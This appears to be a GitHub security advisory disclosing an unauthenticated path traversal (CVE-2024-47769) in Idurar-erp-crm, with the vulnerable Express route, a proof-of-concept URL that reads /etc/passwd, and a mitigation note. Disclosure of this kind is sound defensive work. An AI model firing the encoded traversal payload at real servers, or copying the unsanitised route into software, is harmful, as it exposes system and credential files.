
Path Traversal (unauthenticated user can read sensitive data)

High
salahlalami published GHSA-948g-2vm7-mfv7 Oct 4, 2024

Package

No package listed

Affected versions

<2.1.0

Patched versions

None

Description

Summary

Greetings team, Nishant and I discovered a path traversal issue in Idurar-erp-crm.
Reference link to the security bug class: https://owasp.org/www-community/attacks/Path_Traversal

Details

The vulnerability exists in the corePublicRouter.js file.
The router is mounted as shown below, with no authentication middleware in front of it, so the public endpoint is reachable by an unauthenticated user.

app.use('/public', corePublicRouter);

On line 13 the user-controlled route parameters are interpolated directly into the path.join call without any validation, so an attacker can supply a URL-encoded traversal payload. The vulnerable route (closing braces restored from the truncated excerpt; the catch body is not shown in the advisory):

const express = require('express');
const path = require('path');
const router = express.Router();

router.route('/:subPath/:directory/:file').get(function (req, res) {
  try {
    const { subPath, directory, file } = req.params;
    const options = {
      // subPath and directory come straight from the URL and are never checked
      root: path.join(__dirname, `../../public/${subPath}/${directory}`),
    };
    const fileName = file;
    return res.sendFile(fileName, options, function (error) {
      if (error) {
        return res.status(404).json({
          success: false,
          result: null,
          message: 'we could not find : ' + file,
        });
      }
    });
  } catch (error) {
    // error handling not shown in the advisory excerpt
  }
});

The directory structure can be escaped to read system files by placing an encoded traversal string (the payload) in the subPath position: /public/inject-here/:directory/:file

PoC

Deploy the application with docker using the following commands:

git clone https://github.com/idurar/idurar-erp-crm.git
cd idurar-erp-crm
docker-compose up -d

Visit the URL given below:

http://localhost:8888/public/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd

The following screenshot shows that the /etc/passwd file is readable by an unauthenticated user.
[screenshot: poc]

Impact

An unauthenticated user can read any critical file on the server.

Mitigation

Sanitize the unauthenticated user input. Use path.normalize to fix the issue. https://nodejs.org/api/path.html#path_path_normalize_path

Severity

High


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2024-47769
